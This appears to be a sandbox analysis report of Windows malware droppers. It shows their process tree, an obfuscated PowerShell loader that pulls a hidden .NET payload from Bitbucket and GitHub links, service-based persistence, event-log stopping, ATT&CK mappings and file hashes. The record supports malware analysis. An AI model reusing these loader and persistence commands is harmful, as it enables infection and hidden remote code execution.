C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe"2⤵
- Executes dropped EXE
PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe"2⤵PID:4076
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe"2⤵PID:5024
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe"2⤵PID:1052
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵PID:4852
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.105.161.194filecarrier_ratecon.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.105.161.194filecarrier_ratecon.exe.exe"2⤵PID:1808
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Internal UCP rights saver\Rate Confirmation 1.3.3\install\0B30770\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\http77.105.161.194filecarrier_ratecon.exe.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1727870493 " AI_EUIMSI=""3⤵PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.105.161.194pdffile.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.105.161.194pdffile.exe.exe"2⤵PID:3252
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c tyr.vbs3⤵PID:4780
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tyr.vbs"4⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#Mw#w#HQ#d##v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec5⤵
- Command and Scripting Interpreter: PowerShell
PID:1012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.30tt/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec6⤵
- Command and Scripting Interpreter: PowerShell
PID:2292 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵PID:4928
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe"2⤵PID:1616
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe"2⤵PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe"2⤵PID:3856
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe3⤵PID:212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\svchost015.exe" & del "C:\ProgramData\*.dll"" & exit4⤵PID:4632
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
PID:1924
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe"2⤵PID:848
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe"2⤵PID:2792
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵PID:5856
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66eff9f890580_appSetup.exe#xin.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66eff9f890580_appSetup.exe#xin.exe"2⤵PID:5268
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5552
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe"2⤵PID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe"2⤵PID:5604
-
C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe"C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe"3⤵PID:3052
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe"2⤵PID:5732
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe"2⤵PID:5908
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe"2⤵PID:6056
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe"2⤵PID:4592
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:5028
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:3252
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:1440
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KSKIUXEH"3⤵
- Launches sc.exe
PID:984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KSKIUXEH" binpath= "C:\ProgramData\kttbjzxfyqcy\erzljnhmzkuz.exe" start= "auto"3⤵
- Launches sc.exe
PID:1968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5136
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KSKIUXEH"3⤵
- Launches sc.exe
PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe"2⤵PID:4484
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:5368
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4156 -ip 41561⤵PID:4812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 668 -ip 6681⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exeC:\Users\Admin\AppData\Local\Temp\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe1⤵PID:4868
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1236
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A93FFCA4EDEED0711E2B18EA1C42C248 C2⤵PID:3672
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:3052
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C43663F848F75D06CE796FE0558715232⤵PID:2016
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5092
-
C:\ProgramData\kttbjzxfyqcy\erzljnhmzkuz.exeC:\ProgramData\kttbjzxfyqcy\erzljnhmzkuz.exe1⤵PID:5676
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5712
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5724
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5064
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:3496
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4416
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:1408
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
518KB
MD5a901561c01b877714508aff7cd1257b1
SHA1234192bf63b5d5ec47dcc49641b34046d2215132
SHA256523e991d04e1487ba9dce934700d54c16e53c1e4025d3493705d704f576fcd6e
SHA512176b551cc537ecf3c7384a3460d36fded18af690bc8cc640f5058a295a012a5e2976545df128c81d7ecec77eb73818370aca3a10b65e4b224e14fbf45b001a21
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
11KB
MD549a1cd6f38a739d8d13b9c47e40597e1
SHA1455eeb6ed576725c60d358a47d91a39fd60d0c21
SHA256341aa1adf9fb65eaa8c60e82ac836228781f8a352219656626922eb85d064d57
SHA512c5bee669c56e216f41bcf7149a4511c717fc8283400cab6f6e84c12e7eee3830f0d64cae889a1f3b1af42a21bfa0f29de297cbb492bbb924fc89cfc686259217
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
114KB
MD5503d6b554ee03ef54c8deb8c440f6012
SHA1e306b2a07bf87e90c63418024c92933bcc3f4d7f
SHA2564c407af4d5326d1ea43e89945eda0b86c81ad0d12bd5465b327c0fd1df56f7d4
SHA5123490b51dfe2e8f6efa3cdeee7bc08c03072597861c1a2f88dc830139abb7611c671ddad345c2af97bb1e88927c09467ed92b5feafe6696d7e2b31b3bd3447437
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
3KB
MD5906a96ab3d13d754809f312628f6e4ac
SHA14f1f3d49c788e5736c31904eaf4683ea4e8683c6
SHA25669f03040bf4208bbfc3617a35799ad9897c2235df7832dc7687c8b91ef2f99e8
SHA512a0f5fad77325a869edb9a80beb4f2604c5f6d5af652f21a2283e366cd32d42f6fb2f4761d596c6a77a2d83fda4ab52d9a645aedbce5295223c0e30faf306a851
-
Filesize
108KB
MD51fcb78fb6cf9720e9d9494c42142d885
SHA1fef9c2e728ab9d56ce9ed28934b3182b6f1d5379
SHA25684652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02
SHA512cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3
-
Filesize
18KB
MD58478f98f555bdefb7a432489ddfbdd8e
SHA1b1142a27522fae8791dc50af2b062c4922f27183
SHA256a536ea575bb5d6fa41c2d584353d3f68d7d31997f110be0e02cf4ebf23521b50
SHA512a49450650dc3d9620bd33266ec49e8a5e6a38a0804876c6faf56645e846988062d3c19a3c1b431a4228c8b694f2dc82e3381181e0cdbd02bad8080c882c09eef
-
Filesize
64B
MD513af6be1cb30e2fb779ea728ee0a6d67
SHA1f33581ac2c60b1f02c978d14dc220dce57cc9562
SHA256168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f
SHA5121159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413
-
Filesize
11.2MB
MD57366d8ddcc9fb6721c53f5feef334b1e
SHA191f437cf6b6dd98da5ccbb543020b5e6f1f30f27
SHA256b3b91381d1df6f08d06ac4f74bca4e597b596001966cee4bc4401a46f1b318b0
SHA51241990b1d6338bdd865f5f3f0915fd85ca3d165d27ca4d2f85e2def8d27d3363a28387689a3d1e4bb3b581ca71b0c2dc62cd54bf9e99537750d2f934ddfb81de1
-
Filesize
872KB
MD518ce19b57f43ce0a5af149c96aecc685
SHA11bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558
-
Filesize
549KB
MD506217e9f55ff1dc889a0aa9aa2999b3c
SHA1fad711a89fe670deca51f31fab7249d3f4232b3d
SHA256bd7d098fba2a343099199ba99efd5191d62c341ad8883c7d4049e529f2355ffe
SHA512fff6a95db81a48e6df4493c0aa8b373a97b592388b39c1ec5fd598892a43c4cc3d985d0e1405ac4ab7afc1919169fbff923a1b5bccb42083234a7c972c94317d
-
Filesize
865KB
MD5f893c06408989444917becc2c67e9720
SHA1734160892a99b544f052fd92382010b80d054020
SHA25602631bb82ed0d34347ba2980f9d5eb2ba2cd26e942c3f922b9215dd19ddf267e
SHA512f49127c364acc89e5af14a901acba96ae2d39adb259ac20aebc20d3d9d55441d0c3c4199d886ea11ada02d4f27a3dd36f8d884e627c00d6cfb55fe18cd35fcf2
-
Filesize
64KB
MD5155702daaed607a3b9ae37027494655e
SHA1b641842104fe4d99fcb4daae6435c5c3a9836d4a
SHA25645173dcbe34d1963927f6f5f1a30be883807b9cfa55c27857115a43fa14c9e15
SHA51269c436f8f7918422a7d61260dd242a9b737340f0b6c69e23a04e28b310d8b9f6c2b5534761d57a840e6b68765196ac81172cc43f37d30c6c4d4ec2cafbb02f48
-
Filesize
72KB
MD501d316f7f74b486c817c69726cefc328
SHA126c56b95c7aa7dc4fce2ddaadd9ec344bcc9f2e2
SHA256dc10cd792e2859702c384da65c0c1bdaac764563c7311fb3c58495ed96791534
SHA512373f403b537e833fe052640cbf75d4c819352027029dcc552fa3dc1d2fddd0fa36ac9084bfc912186b78951c3390414d123eb50b01c4be64101b5b4d2e96c720
-
Filesize
51KB
MD5b6b68a11d199c97c897a262d3314a9ed
SHA107b63697ebdfdcd1910390b43477562dbc150355
SHA2564a1c8403f1325713242c06529510ea73e88590760d20d836d7ba987586e99613
